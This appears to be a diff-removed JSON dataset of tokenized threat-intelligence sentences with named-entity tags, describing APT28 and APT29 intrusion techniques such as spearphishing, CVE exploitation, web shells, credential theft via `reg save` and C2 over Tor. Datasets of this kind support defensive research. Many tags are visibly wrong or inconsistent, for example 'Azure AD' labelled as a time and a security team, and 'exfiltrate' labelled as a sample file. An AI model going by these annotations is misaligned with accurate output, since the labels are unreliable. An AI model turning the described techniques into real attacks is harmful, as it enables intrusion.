- "custom", - "algorithm", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "used", - "weaponized", - "Microsoft", - "Word", - "documents", - "abusing", - "the", - "remote", - "template", - "function", - "to", - "retrieve", - "a", - "malicious", - "macro." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "performed", - "timestomping", - "on", - "victim", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "CVE-2015-1701", - "to", - "access", - "the", - "SYSTEM", - "token", - "and", - "copy", - "it", - "into", - "the", - "current", - "process", - "as", - "part", - "of", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "obtained", - "and", - "used", - "open-source", - "tools", - "like", - "Koadic,", - "Mimikatz,", - "and", - "Responder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Once", - "APT28", - "gained", - "access", - "to", - "the", - "DCCC", - "network,", - "the", - "group", - "then", - "proceeded", - "to", - "use", - "that", - "access", - "to", - "compromise", - "the", - "DNC", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "legitimate", - "credentials", - "to", - "gain", - "initial", - "access,", - "maintain", - "access,", - "and", - "exfiltrate", - "data", - "from", - "a", - "victim", - "network.", - "The", - "group", - "has", - "specifically", - "used", - "credentials", - "stolen", - "through", - "a", - "spearphishing", - "email", - "to", - "login", - "to", - "the", - "DCCC", - "network.", - "The", - "group", - "has", - "also", - "leveraged", - "default", - "manufacturer's", - "passwords", - "to", - "gain", - "initial", - "access", - "to", - "corporate", - "networks", - "via", - "IoT", - "devices", - "such", - "as", - "a", - "VOIP", - "phone,", - "printer,", - "and", - "video", - "decoder." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "I-Purp", - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "hosted", - "phishing", - "domains", - "on", - "free", - "services", - "for", - "brief", - "periods", - "of", - "time", - "during", - "campaigns." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "APT28", - "has", - "performed", - "large-scale", - "scans", - "in", - "an", - "attempt", - "to", - "find", - "vulnerable", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Later", - "implants", - "used", - "by", - "APT28,", - "such", - "as", - "CHOPSTICK,", - "use", - "a", - "blend", - "of", - "HTTP,", - "HTTPS,", - "and", - "other", - "legitimate", - "channels", - "for", - "C2,", - "depending", - "on", - "module", - "configuration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "newly-created", - "Blogspot", - "pages", - "for", - "credential", - "harvesting", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "a", - "modified", - "and", - "obfuscated", - "version", - "of", - "the", - "reGeorg", - "web", - "shell", - "to", - "maintain", - "persistence", - "on", - "a", - "target's", - "Outlook", - "Web", - "Access", - "(OWA)", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT28", - "loader", - "Trojan", - "uses", - "a", - "cmd.exe", - "and", - "batch", - "script", - "to", - "run", - "its", - "payload.", - "The", - "group", - "has", - "also", - "used", - "macros", - "to", - "execute", - "payloads." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "used", - "sticky-keys", - "to", - "obtain", - "unauthenticated,", - "privileged", - "console", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "a", - "compromised", - "global", - "administrator", - "account", - "in", - "Azure", - "AD", - "to", - "backdoor", - "a", - "service", - "principal", - "with", - "`ApplicationImpersonation`", - "rights", - "to", - "start", - "collecting", - "emails", - "from", - "targeted", - "mailboxes;", - "APT29", - "has", - "also", - "used", - "compromised", - "accounts", - "holding", - "`ApplicationImpersonation`", - "rights", - "in", - "Exchange", - "to", - "collect", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT29", - "used", - "large", - "size", - "files", - "to", - "avoid", - "detection", - "by", - "security", - "solutions", - "with", - "hardcoded", - "size", - "limits." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "hijacked", - "legitimate", - "application-specific", - "startup", - "scripts", - "to", - "enable", - "malware", - "to", - "execute", - "on", - "system", - "startup." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "bypassed", - "UAC." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "leveraged", - "the", - "Microsoft", - "Graph", - "API", - "to", - "perform", - "various", - "actions", - "across", - "Azure", - "and", - "M365", - "environments.", - "They", - "have", - "also", - "utilized", - "AADInternals", - "PowerShell", - "Modules", - "to", - "access", - "the", - "API" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "conducted", - "enumeration", - "of", - "Azure", - "AD", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "can", - "create", - "new", - "users", - "through", - "Azure", - "AD." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-SecTeam" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "residential", - "proxies,", - "including", - "Azure", - "Virtual", - "Machines,", - "to", - "obfuscate", - "their", - "access", - "to", - "victim", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "gained", - "access", - "to", - "a", - "global", - "administrator", - "account", - "in", - "Azure", - "AD", - "and", - "has", - "used", - "`Service", - "Principal`", - "credentials", - "in", - "Exchange." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "Azure", - "Run", - "Command", - "and", - "Azure", - "Admin-on-Behalf-of", - "(AOBO)", - "to", - "execute", - "code", - "on", - "virtual", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "leveraged", - "compromised", - "high-privileged", - "on-premises", - "accounts", - "synced", - "to", - "Office", - "365", - "to", - "move", - "laterally", - "into", - "a", - "cloud", - "environment,", - "including", - "through", - "the", - "use", - "of", - "Azure", - "AD", - "PowerShell." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "stolen", - "data", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "enrolled", - "their", - "own", - "devices", - "into", - "compromised", - "cloud", - "tenants,", - "including", - "enrolling", - "a", - "device", - "in", - "MFA", - "to", - "an", - "Azure", - "AD", - "environment", - "following", - "a", - "successful", - "password", - "guessing", - "attack", - "against", - "a", - "dormant", - "account." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "created", - "self-signed", - "digital", - "certificates", - "to", - "enable", - "mutual", - "TLS", - "authentication", - "for", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "disabled", - "Purview", - "Audit", - "on", - "targeted", - "accounts", - "prior", - "to", - "stealing", - "emails", - "from", - "Microsoft", - "365", - "tenants." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "B-Purp", - "O", - "I-Org", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "the", - "meek", - "domain", - "fronting", - "plugin", - "for", - "Tor", - "to", - "hide", - "the", - "destination", - "of", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "Dynamic", - "DNS", - "providers", - "for", - "their", - "malware", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "B-Purp", - "B-Org", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "compromised", - "email", - "accounts", - "to", - "further", - "enable", - "phishing", - "campaigns", - "and", - "taken", - "control", - "of", - "dormant", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "multiple", - "layers", - "of", - "encryption", - "within", - "malware", - "to", - "protect", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "exploited", - "CVE-2019-19781", - "for", - "Citrix,", - "CVE-2019-11510", - "for", - "Pulse", - "Secure", - "VPNs,", - "CVE-2018-13379", - "for", - "FortiGate", - "VPNs,", - "and", - "CVE-2019-9670", - "in", - "Zimbra", - "software", - "to", - "gain", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "multiple", - "software", - "exploits", - "for", - "common", - "client", - "software,", - "like", - "Microsoft", - "Word,", - "Exchange,", - "and", - "Adobe", - "Reader,", - "to", - "gain", - "code", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Tool", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "exploited", - "CVE-2021-36934", - "to", - "escalate", - "privileges", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "uses", - "compromised", - "residential", - "endpoints", - "as", - "proxies", - "for", - "defense", - "evasion", - "and", - "network", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "compromised", - "identities", - "to", - "access", - "networks", - "via", - "VPNs", - "and", - "Citrix." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "SDelete", - "to", - "remove", - "artifacts", - "from", - "victim", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "embedded", - "an", - "ISO", - "file", - "within", - "an", - "HTML", - "attachment", - "that", - "contained", - "JavaScript", - "code", - "to", - "initiate", - "malware", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "uses", - "compromised", - "residential", - "endpoints,", - "typically", - "within", - "the", - "same", - "ISP", - "IP", - "address", - "range,", - "as", - "proxies", - "to", - "hide", - "the", - "true", - "source", - "of", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "edited", - "the", - "`Microsoft.IdentityServer.Servicehost.exe.config`", - "file", - "to", - "load", - "a", - "malicious", - "DLL", - "into", - "the", - "AD", - "FS", - "process,", - "thereby", - "enabling", - "persistent", - "access", - "to", - "any", - "service", - "federated", - "with", - "AD", - "FS", - "for", - "a", - "user", - "with", - "a", - "specified", - "User", - "Principal", - "Name." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "downloaded", - "additional", - "tools", - "and", - "malware", - "onto", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "ensured", - "web", - "servers", - "in", - "a", - "victim", - "environment", - "are", - "Internet", - "accessible", - "before", - "copying", - "tools", - "or", - "malware", - "to", - "it." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "the", - "`reg", - "save`", - "command", - "to", - "extract", - "LSA", - "secrets", - "offline." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "targets", - "dormant", - "or", - "inactive", - "user", - "accounts,", - "accounts", - "belonging", - "to", - "individuals", - "no", - "longer", - "at", - "the", - "organization", - "but", - "whose", - "accounts", - "remain", - "on", - "the", - "system,", - "for", - "access", - "and", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "various", - "forms", - "of", - "spearphishing", - "attempting", - "to", - "get", - "a", - "user", - "to", - "open", - "attachments,", - "including,", - "but", - "not", - "limited", - "to,", - "malicious", - "Microsoft", - "Word", - "documents,", - ".pdf,", - "and", - ".lnk", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "various", - "forms", - "of", - "spearphishing", - "attempting", - "to", - "get", - "a", - "user", - "to", - "click", - "on", - "a", - "malicous", - "link." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "unique", - "malware", - "in", - "many", - "of", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "embedded", - "ISO", - "images", - "and", - "VHDX", - "files", - "in", - "HTML", - "to", - "evade", - "Mark-of-the-Web." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "renamed", - "malicious", - "DLLs", - "with", - "legitimate", - "names", - "to", - "appear", - "benign;", - "they", - "have", - "also", - "created", - "an", - "Azure", - "AD", - "certificate", - "with", - "a", - "Common", - "Name", - "that", - "matched", - "the", - "display", - "name", - "of", - "the", - "compromised", - "service", - "principal." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Exp", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "use", - "`mshta`", - "to", - "execute", - "malicious", - "scripts", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "repeated", - "MFA", - "requests", - "to", - "gain", - "access", - "to", - "victim", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "backdoor", - "used", - "by", - "APT29", - "created", - "a", - "Tor", - "hidden", - "service", - "to", - "forward", - "traffic", - "from", - "the", - "Tor", - "client", - "to", - "local", - "ports", - "3389", - "(RDP),", - "139", - "(Netbios),", - "and", - "445", - "(SMB)", - "enabling", - "full", - "remote", - "access", - "from", - "outside", - "the", - "network", - "and", - "has", - "also", - "used", - "TOR." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Idus", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT29", - "used", - "Kerberos", - "ticket", - "attacks", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "successfully", - "conducted", - "password", - "guessing", - "attacks", - "against", - "a", - "list", - "of", - "mailboxes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "conducted", - "brute", - "force", - "password", - "spray", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-OffAct", - "I-Way", - "I-Way", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "encoded", - "PowerShell", - "scripts", - "uploaded", - "to", - "CozyCar", - "installations", - "to", - "download", - "and", - "install", - "SeaDuke." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT29", - "has", - "developed", - "malware", - "variants", - "written", - "in", - "Python." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "installed", - "a", - "run", - "command", - "on", - "a", - "compromised", - "system", - "to", - "enable", - "malware", - "execution", - "on", - "system", - "startup." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "added", - "Registry", - "Run", - "keys", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "collected", - "emails", - "from", - "targeted", - "mailboxes", - "within", - "a", - "compromised", - "Azure", - "AD", - "tenant", - "and", - "compromised", - "Exchange", - "servers,", - "including", - "via", - "Exchange", - "Web", - "Services", - "(EWS)", - "API", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "named", - "and", - "hijacked", - "scheduled", - "tasks", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "the", - "`reg", - "save`", - "command", - "to", - "save", - "registry", - "hives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "used", - "UPX", - "to", - "pack", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "spearphishing", - "emails", - "with", - "an", - "attachment", - "to", - "deliver", - "files", - "with", - "exploits", - "to", - "initial", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "spearphishing", - "with", - "a", - "link", - "to", - "trick", - "victims", - "into", - "clicking", - "on", - "a", - "link", - "to", - "a", - "zip", - "file", - "containing", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "the", - "legitimate", - "mailing", - "service", - "Constant", - "Contact", - "to", - "send", - "phishing", - "e-mails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT29", - "uses", - "stolen", - "tokens", - "to", - "access", - "victim", - "accounts,", - "without", - "needing", - "a", - "password." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "abused", - "misconfigured", - "AD", - "CS", - "certificate", - "templates", - "to", - "impersonate", - "admin", - "users", - "and", - "create", - "additional", - "authentication", - "certificates." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Org", - "I-Org", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "timestomping", - "to", - "alter", - "the", - "Standard", - "Information", - "timestamps", - "on", - "their", - "web", - "shells", - "to", - "match", - "other", - "files", - "in", - "the", - "same", - "directory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "obtained", - "and", - "used", - "a", - "variety", - "of", - "tools", - "including", - "Mimikatz,", - "SDelete,", - "Tor,", - "meek,", - "and", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "APT29", - "has", - "compromised", - "IT,", - "cloud", - "services,", - "and", - "managed", - "services", - "providers", - "to", - "gain", - "broad", - "access", - "to", - "multiple", - "customers", - "for", - "subsequent", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Idus", - "I-Idus", - "O", - "O", - "I-Org", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "a", - "compromised", - "account", - "to", - "access", - "an", - "organization's", - "VPN", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "conducted", - "widespread", - "scanning", - "of", - "target", - "environments", - "to", - "identify", - "vulnerabilities", - "for", - "exploit." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "registered", - "algorithmically", - "generated", - "Twitter", - "handles", - "that", - "are", - "used", - "for", - "C2", - "by", - "malware,", - "such", - "as", - "HAMMERTOSS.", - "APT29", - "has", - "also", - "used", - "legitimate", - "web", - "services", - "such", - "as", - "Dropbox", - "and", - "Constant", - "Contact", - "in", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Idus", - "O", 